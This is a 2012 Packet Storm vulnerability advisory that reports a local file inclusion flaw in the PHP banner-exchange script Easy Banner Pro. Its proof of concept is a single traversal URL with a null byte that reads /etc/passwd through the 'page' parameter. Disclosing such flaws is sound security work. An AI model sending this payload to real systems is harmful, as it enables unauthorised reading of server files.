Easy Banner Pro Local File Inclusion

2012-08-24T00:00:00
ID PACKETSTORM:115874
Type packetstorm
Reporter Yakir Wizman
Modified 2012-08-24T00:00:00

Description

                                        
                                            `-----------------------------------------------------------  
Easy Banner Pro (index.php page) Local file inclusion  
Bug discovered by Yakir Wizman  
Date 24/08/2012  
Vendor Homepage - http://www.phpwebscripts.com/easybannerpro/  
Demo - http://www.scripts-demo.com/easybannerpro/  
ISRAEL  
-----------------------------------------------------------  
Author will be not responsible for any damage.  
-----------------------------------------------------------  
  
About the Application  
-----------------------------------------------------------  
Easy Banner Pro is an advanced and very easy to use PHP script for running your own banner exchange system.  
  
  
Proof Of Conecpt  
-----------------------------------------------------------  
Local file inclusion (Severity is high)  
Vulnerable URL : http://server/easybannerpro/index.php?page=../../../../../../../../../../etc/passwd%00  
  
`